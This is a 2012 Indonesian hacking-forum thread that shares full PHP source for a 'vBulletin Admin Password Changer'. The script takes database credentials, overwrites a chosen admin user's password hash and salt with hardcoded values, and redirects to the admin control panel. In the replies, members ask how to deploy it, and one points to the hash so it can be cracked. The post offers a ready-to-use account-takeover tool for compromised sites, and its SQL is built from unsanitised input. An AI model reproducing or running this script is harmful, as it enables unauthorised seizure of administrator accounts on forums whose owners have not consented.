Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-20-2013, 02:28 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
1 2 3 4 5 ... 15 Next »

[Tutor] Vbulletin Admin Password Changer

Home General Computer Multimedia Business Lounge

Pages (2): 1 2 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor Vbulletin Admin Password Changer
02-17-2012, 11:55 PM
Post: #1
_Faz_ Offline
./Devilz Officer
Posts: 58
Joined: Jan 2012
Reputation: 27
Vbulletin Admin Password Changer
bangga

Code:
<?php
/*
| Coded By IraQiaN-r0x
*/
//Style & Designe HTML Code
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>R00T@vBulletin ~</title>
<style type="text/css">
*{margin: 0; padding: 0;}
body{text-align: center;
font: 11px Tahoma;
color: #333333;
background: #EEEEEE url(images/background.gif) repeat-x 0 0;
}
a{color:red;
text-decoration: none;
}
a:hover {text-decoration: none;
color: #ff0000;
}
.box {background-color: #FFFFFF;
border: 1px solid #DDDDDD;
padding: 6px;
margin-bottom: 10px;
width : 40%;
}
.box h3 {background-color: red;
color: #ffffff;
font-size: 11px;
padding: 4px;
margin-bottom: 5px;
}
#comments form p {margin-bottom: 5px;}
#comments form input {margin-right: 5px;}
#comments form input, textarea {border: 1px solid #cccccc;
font-size: 11px;
font-family: tahoma;
padding: 4px;
background-position: 4px 4px;
background-repeat: no-repeat;
}
#comments form input {border: 1px solid #cccccc;
}
#comments form textarea {padding: 4px 4px !important;
border: 1px solid #cccccc;
}
#comments form button {border: 1px solid #a0a0a0;
font-size: 1em;
font-family: Verdana;
padding: 2px 6px;
}
</style>
</head>
<body>
<br />
<br />
<br />
<div align="center">
<div class="box">
<h3>Update vBulletin aDmin pAsswOrd</h3>

';
//Start Of Code
switch($_GET[action])
{default:$url = $_SERVER['HTTP_HOST'];
PRINT '
<div id="comments"><form id="form1" onsubmit="document.getElementById(\'form1\').style.display = \'none\';document.getElementById(\'loading\').style.display = \'none\';" name="form1" method="post" action="?action=Start"><table width="65%" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td height="35">Database Host : </td><td height="35">
                <input name="DBHost" type="text" id="DBHost" value="localhost"  /></td></tr><tr><td width="41%" height="35">Database Name : </td><td width="59%" height="35"><input name="DBName" type="text" id="DBName" /></td></tr><tr><td height="35">Database Username : </td><td height="35"><input name="DBUser" type="text" id="DBUser" value="root" /></td></tr><tr><td height="35">Database Password : </td><td height="35"><input name="DBPass" type="text" id="DBPass" /></td></tr><tr><td height="35">Forum URL : </td><td height="35"><br><input name="Url" type="text" id="Url" value="'.$url.'" /><br />
                <span style="font-size: 10px">Without <font color="#FF0000">/</font> in The End Of Domain</span></td></tr><tr><td height="35">Admin ID : </td><td height="35"><input name="adminId" type="text" id="adminId" value="1" size="2" maxlength="10" /></td></tr></table><br /><input type="submit" name="Submit" value="Go Now!" /></form></div><div id="loading" style="display:none;">Please Wait...</div>
';
break;
case Start:$Connect = @mysql_select_db($_POST[DBName],mysql_pconnect($_POST[DBHost],$_POST[DBUser],$_POST[DBPass]));
$Update  =@mysql_query("UPDATE `user` SET `password` = 'bf99d80cd64818d4f8e63ed2af5fa79a',`salt` = 'I_d' WHERE `userid` = '".$_POST[adminId]."'"); //MD5 & Salt Password
$url  = $_POST[Url].'/admincp';
if($Connect)
{echo '<b style="color:green;">Connected To Database !</b><br>';
}else{
echo '<b style="color:red;">Error : Could Not Connect To Database !!</b><br>';
}if($Update){
echo '<b style="color:green;">Password Has Been Updated !</b><br>';
}else{
echo '<b style="color:red;">Error : Could Not Update The Password</b><br>';
}if($Update && $Connect){
echo '<meta http-equiv="refresh"content="3;URL='.$url.'"/><b style="color:green;">Please Wait 3 Seconds ..</b><br>';
}
break;
}
//End Of Code

//Footer HTML
echo '
</div>
</div>Powered By <a href="http://vb.iraqbugs.com/">IRAQbugs</a> 2011<br><br>
Coded by <a href="http://vb.iraqbugs.com/member.php?u=1"target="_blank">IraQiaN-r0x</a>
</body>
</html>
';
//Coded By IraQiaN-r0x
?>
Find all posts by this user
Quote this message in a reply
 Reputed by :  red-devilz-666(+1)
02-18-2012, 03:03 AM
Post: #2
KillerByte Offline
./Devilz Commander
Posts: 337
Joined: Jan 2012
Reputation: 5
RE: Vbulletin Admin Password Changer
password barunya nanti apa? pasrah
Visit this user's website Find all posts by this user
Quote this message in a reply
02-18-2012, 08:38 AM
Post: #3
PrOReBeLL Offline
Newbie Yang Mencoba Maju.
Posts: 574
Joined: Jul 2010
Reputation: 26
RE: Vbulletin Admin Password Changer
(02-18-2012 03:03 AM)KillerByte Wrote:  password barunya nanti apa? pasrah

coba perhatikan ini gan

Code:
case Start:$Connect = @mysql_select_db($_POST[DBName],mysql_pconnect($_POST[DBHost],$_POST[DBUser],$_POST[DBPass]));
$Update  =@mysql_query("UPDATE `user` SET `password` = 'bf99d80cd64818d4f8e63ed2af5fa79a',`salt` = 'I_d' WHERE `userid` = '".$_POST[adminId]."'");

dsna jelas ada update an password nya
password` = 'bf99d80cd64818d4f8e63ed2af5fa79a

tinggal ente decrypt aja ketawa
Find all posts by this user
Quote this message in a reply
02-18-2012, 03:33 PM
Post: #4
KillerByte Offline
./Devilz Commander
Posts: 337
Joined: Jan 2012
Reputation: 5
RE: Vbulletin Admin Password Changer
ngakak ada yang ane bingung, judulnya pake tag [TUTOR] tapi kok cuma ngasih source ketawa

pasrah
Visit this user's website Find all posts by this user
Quote this message in a reply
02-23-2012, 06:34 PM
Post: #5
dadjal Offline
./Devilz Officer
Posts: 141
Joined: Feb 2012
Reputation: 0
RE: Vbulletin Admin Password Changer
piye tutornya bingung
Visit this user's website Find all posts by this user
Quote this message in a reply
02-26-2012, 03:08 PM
Post: #6
aLdyJrz Offline
./Devilz 1st Cadet
Posts: 36
Joined: Jul 2011
Reputation: 0
RE: Vbulletin Admin Password Changer
tutor nya mana -_- kok cuma source doangs
Visit this user's website Find all posts by this user
Quote this message in a reply
02-26-2012, 11:06 PM
Post: #7
beg3nk newb1e Offline
./Devilz Advisor
Posts: 919
Joined: Feb 2012
Reputation: 53
RE: Vbulletin Admin Password Changer
belajar
Visit this user's website Find all posts by this user
Quote this message in a reply
02-27-2012, 09:04 AM
Post: #8
Gilang_Rny3 Offline
./Devilz 1st Cadet
Posts: 3
Joined: Feb 2012
Reputation: 0
RE: Vbulletin Admin Password Changer
itu diupload kemana mas bro source nya ?? nangis
Find all posts by this user
Quote this message in a reply
03-12-2012, 12:31 PM
Post: #9
bebel Offline
./Devilz Officer
Posts: 54
Joined: Jan 2012
Reputation: 0
RE: Vbulletin Admin Password Changer
ngasih nya setengah2 nih , newbie kepusingan :S
Visit this user's website Find all posts by this user
Quote this message in a reply
03-12-2012, 12:41 PM
Post: #10
g4t4n4 Offline
./Devilz Officer
Posts: 145
Joined: Dec 2011
Reputation: 4
RE: Vbulletin Admin Password Changer
hadoh?
Itu diapain source nya suram
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (2): 1 2 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  #DiyWeb Admin Bypass dan Remote file/shell Upload exploit AnonymousOpsID 4 335 11-06-2012 05:07 PM
Last Post: rock_me
Photo [Ask] [ask] konsep password joomla gysu 1 127 10-28-2011 11:42 PM
Last Post: Qiezaqie
  vBulletin with Exploit.. M4y4t 13 222 12-02-2010 08:19 PM
Last Post: nj mania
  vBulletin 3.6.5 "misc.php" Sql oela 8 120 03-07-2010 12:27 AM
Last Post: kiddies
  vBulletin Denial of Service Vulnerability wenkhairu 2 72 01-04-2010 08:22 PM
Last Post: wenkhairu

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-20-2013, 02:28 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE